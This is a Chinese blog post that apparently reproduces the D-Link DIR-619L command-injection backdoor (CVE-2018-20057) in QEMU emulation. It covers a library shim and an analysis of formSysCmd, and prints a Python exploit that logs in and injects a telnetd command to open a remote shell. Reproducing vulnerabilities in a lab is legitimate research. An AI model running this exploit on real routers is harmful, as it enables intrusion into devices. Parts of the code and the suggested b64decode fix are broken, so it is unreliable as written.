DIR619L命令注入漏洞复现(CVE-2018-20057)

最新推荐文章于 2024-10-09 20:41:11 发布
最新推荐文章于 2024-10-09 20:41:11 发布
阅读量253 收藏 1
点赞数
文章标签: 安全 iot
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cz010822/article/details/132810696
版权

准备工作

固件下载:链接:https://pan.baidu.com/s/13rFWtrGv3vvkWwPTmG7QTA ,提取码:fifv

固件仿真

sudo chroot ./ ./qemu-mips-static -E LD_PRELOAD="./apmib-ld.so" ./bin/boa

 

动态库劫持,修复Initialize AP MIB failed

 mips-linux-gnu-gcc -Wall -fPIC -shared apmib.c -o apmib-ld.so
#include <stdio.h>
#include <stdlib.h>
#define MIB_IP_ADDR 170
#define MIB_HW_VER 0x250
#define MIB_CAPTCHA 0x2C1

int apmib_init(void)
{
    return 1;
}

int fork(void)
{
    return 0;
}
void apmib_get(int code, int *value)
{
    switch(code)
    {
        case MIB_HW_VER:
            *value = 0xF1;
            break;
        case MIB_IP_ADDR:
            *value = 0x7F000001;
            break;
        case MIB_CAPTCHA:
            *value = 1;
            break;
    }
    return;
}

用户模式进行固件仿真,再次输入以下命令

sudo chroot ./ ./qemu-mips-static -E LD_PRELOAD="./apmib-ld.so" ./bin/boa

 在进行第一步修复后,查看80端口已开启,然后在浏览器输入ip地址,然后却连接失败,这边还是报错了

最后搜到可用的解决方法就是打开固件下 /web/first.asp 文件,把蓝线的文本换成红线的文本就ok了,如果对gdb熟练也可以使用gdb调试来修复 apmib.som中的 segment fault 

 

漏洞原理

DIR-619L,硬件版本B1,产品型号2.02,在 /bin/boa 文件的 formSysCmd 函数存在后门,导致攻击者在身份认证后可以通过访问 http://[ip]//goform/form/formSysCmd 并指定 sysCmd 参数,从而实现远程命令注入

漏洞分析

查看ida中的反编译代码,在formSysCmd函数中中,首先获取sysCmd参数,然后通过snprintf写入栈中变量,直接调用system函数执行该参数内容。

漏洞利用

首先安装pwntools

sudo apt-get install libssl-dev libffi-dev build-essential
git clone https://github.com/Gallopsled/pwntools.git
sudo apt update && apt install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade pwntools
pip3 list | grep pwntools

其次,由于该漏洞是在身份认证成功之后才可实现命令注入,需要先登录输入用户名和口令。由于是在qemu中模拟固件,通过apmib_get读取路由器本地配置无法实现,所以在劫持了apmib_get函数之后,login输入的用户名和密码暂时填为空。

 exp

import requests
import sys
import struct
import base64
from pwn import *
context(arch='mips',endian='big',log_level='debug')

ip='127.0.01'
port=80
def login(user,password):
    postData = {
    'login_name':'',
    'curTime':'1234',
    'FILECODE':'',
    'VER_CODE':'',
    'VERIFICATION_CODE':'',
    'login_n':user,
    'login_pass':base64.b64encode(password),
    }
    response = requests.post('http://'+ip+'/goform/formLogin',data=postData)
    #print response.url
def syscmd(cmd):
    postData = {
    'sysCmd':cmd,
    'submit-url':'1234',
    }
    response = requests.post('http://'+ip+'/goform/formSysCmd',data=postData)
    #print response.url
def inter():
    p=remote(ip,port)
    p.interactive()
if __name__ == "__main__":
    login('','')    syscmd('telnetd -p '+str(port))
    inter()

然后就报错 

在网上找到了解决方法,上面错误“类型错误:需要类似字节的对象,而不是字符串”,在Python3中:因为3.x中字符都为unicode编码,函数b64encode的参数的数据类型是bytes类型的字符串对象,而我们给的是str类型的变量,所以必须进行转码

所以将下面的 b64encode 改为 b64 decode 就可以了


 

 另由于qemu模拟时,/dev下没有pty设备,导致telnet连接不能实现,但是端口是已经打开了:

 利用效果:

 

 

 

_Dream_C
关注
CVE-2018-3760漏洞复现(任意文件读取)
千寻的博客
01-07 4140
CVE-2018-3760漏洞复现(任意文件读取) 0x00 漏洞介绍 Ruby On Rails是一个著名的Ruby Web开发框架,它使用链轮作为开发环境中的静态文件服务器。Sprockets是一个编译和分发静态资源文件的Ruby库。 在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。 0x...
命令注入之Shellshock漏洞复现CVE-2014-6271)
SmileAssassn的博客
01-23 598
命令注入之Shellshock漏洞复现CVE-2014-6271)
CVE-2020-11978)Airflow dag中的命令注入漏洞复现【vulhub靶场】
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
06-18 3370
Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前的示例DAG中存在一处命令注入漏洞,未授权的访问者可以通过这个漏洞在Worker中执行任意命令。基于vulhub靶场的CVE-2020-11978漏洞复现,airflow dag中的命令注入RCE和反弹shell教学。漏洞复现。......
CVE-2022-24288:Apache Airflow OS命令注入漏洞复现
热爱学习,喜欢折腾!
08-24 1974
在 Apache Airflow 2.2.4 之前的版本中,一些示例 DAG 没有正确清理用户提供的参数,使其容易受到来自 Web UI 的 OS 命令注入的影响。Apache Airflow是美国阿帕奇(Apache)基金会的一套用于创建、管理和监控工作流程的开源平台。............
WebLogic反序列化漏洞CVE-2018-2628漏洞检测与利用
a1b2c3是弱口令
12-08 5201
Oracle官方发布了4月份的关键补丁更新CPU(Critical Patch Update),其中包含Weblogic反序列化漏洞可导致远程代码执行漏洞漏洞威胁等级为高危,对应的CVE编号为CVE-2018-26 影响版本 Oracle WebLogic Server10.3.6.0 Oracle WebLogic Server12.2.1.2 Oracle WebLogic Serv...
OpenSSH命令注入复现(CVE-2020-15778)
BROTHERYY的博客
08-04 2016
漏洞介绍 SCP(secure copy)是linux系统下基于ssh登录进行安全远程文件拷贝的命令,可以在linux之间复制文件和目录。 OpenSSH中小于 8.3p1版本 SCP命令里存在命令注入漏洞。当将文件复制到远程服务器时,文件路径附加在本地scp命令的末尾,可以触发命令注入漏洞。 攻击者可以采用反引号(`)文件作为命令注入执行scp命令命令将会发送到远程服务器并执行。 影响版本 version: <=openssh-8.3p1 复现环境 攻击机:192.168.20.101 靶机:19
渗透测试---命令执行注入
孤的博客
08-21 1677
概述 命令执行漏洞是指可以随意执行系统命令,属于高危漏洞之一,也属于代码执行范围内 导致原因 代码过滤不严格 系统漏洞 调用第三方组件 如:php(system(),shell_exec(),exec(),eval())、 java(struts2)、thinkphp(老牌的php框架)等 &、&&、|、|| 再windows和linux的命令执行中,都有同样的效果 &...
scp命令注入漏洞复现(CVE-2020-15778)处理
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
12-30 2483
概要 openSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令,不过前提是需要知道ssh的登录密码。 OpenSSh是用于使用SSH(Secure SHell)协议进行加密远程登录的免费开源实现。它可以有效保护登录及数据的安全。其中,SCP(secure copy)是linux系统下基于ssh登录进行安全远程文件拷贝的命令,可以在linux之间复制文件和目录。 【影响范围】:OpenSSH <= 8.3p1 漏洞攻击原理说明 当使用scp复制文件到远程服
OpenSSH 命令注入漏洞复现CVE-2020-15778)
weixin_47230336的博客
09-14 631
OpenSSH 命令注入漏洞CVE-2020-15778) CVE编号: CVE-2020-15778 发布时间: 2020-07-24 危害等级: 高危 漏洞版本:<= openssh-8.3p1 漏洞描述: OpenSSH 8.3p1及之前版本中的scp的scp.c文件存在操作系统命令注入漏洞。该漏洞即使在禁用ssh登录的情况下,但是允许使用scp传文件,而且远程服务器允许使用反引号(`),可利用scp复制文件到远程服务器时,执行带有payload的scp命令,从而在后续利用中getshell。
OpenSSH命令注入漏洞复现CVE-2020-15778)
weixin_44537595的博客
10-24 3058
OpenSSH命令注入漏洞复现 1、简介 OpenSSH 是 SSH (Secure SHell) 协议的免费开源实现,ssh主要就是用来远程控制计算机,或传输文件,OpenSSH是使用SSH透过计算机网络加密通讯的实现。 2、漏洞概述 该漏洞是存在于scp在拷贝文件时产生的一个代码注入漏洞,攻击者可以利用此漏洞执行任意命令,比如:反弹shell, 3、影响版本 openssh <= openssh-8.3p1 4、实验环境 首先下载openssh,版本要符合漏洞影响的版本 服务端:apt-get
CVE-2022-36446 Webmin命令注入漏洞复现
热爱学习,喜欢折腾!
08-15 3756
Webmin是一款功能强大的基于Web的Unix系统管理工具,管理员可以通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。近日,Webmin被披露存在一个任意命令注入漏洞CVE-2022-36446),其CVSS评分为9.8,目前该漏洞的PoC/EXP已公开。Webmin版本1.997之前,由于缺乏输入清理,导致可以注入将连接到包管理器调用的任意命令。经过身份验证且有权访问软件包更新模块的用户可以通过在新软件包安装期间执行 OS 命令注入实现在系统上以 root 权限运行命令。........
网络安全概述:从认知到实践
l1x1n0的博客
10-04 932
网络安全:保护网络系统的硬件、软件及数据,确保其不受破坏、泄露或篡改。网络安全是一个不断发展的领域,需要个人、企业和国家共同努力。提高安全意识,掌握基本防护技能,遵守相关法律法规,是每个网络用户应尽的责任。同时,网络安全产业的快速发展也为相关人才提供了广阔的职业前景。
信息安全工程师(28)机房安全分析与防护
m0_73399576的博客
10-02 932
信息安全工程师——机房安全分析与防护篇
Ping32引领数据防泄漏新潮流:智能、高效、安全
2201_75471311的博客
10-09 316
Ping32凭借其智能、高效、安全的特点,为企业数据防泄漏提供了全面的解决方案。面对日益严峻的数据安全形势,企业需积极采取先进技术,提升数据保护能力,Ping32无疑是值得信赖的合作伙伴。
MySQL 安全
学习,分享一直在路上
10-06 999
MySQL安全实践
叉车毫米波雷达防撞技术,保护叉车作业安全
jiuxin666的博客
10-09 297
叉车毫米波防撞系统利用毫米波雷达技术实时监测环境,预警并紧急制动防碰撞,适用于狭窄通道,保护驾驶员及财产安全,实现叉车作业安全高效。
智能运维与问题诊断工具:提升生产环境的安全稳定性
TechEnthusiast的博客
10-09 170
Prometheus是一个开源的监控和告警系统,而Grafana是一个强大的可视化平台。两者结合使用,可以为系统提供全面的监控和分析能力。ELK Stack是一套强大的日志管理和分析工具集,能够收集、处理、存储和可视化大量日志数据。Datadog是一个全面的监控和分析平台,提供了对应用、服务器、数据库和云服务的实时监控。New Relic提供了全面的应用性能监控和诊断能力,帮助开发团队快速识别和解决问题。PagerDuty是一个事件响应平台,帮助团队快速响应并解决IT事件和中断。
网络安全的全面指南
最新发布
qq_42568323的博客
10-09 614
网络安全是指保护计算机网络及其数据免受未经授权访问、攻击或破坏的过程。其目标是确保信息的机密性、完整性和可用性。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值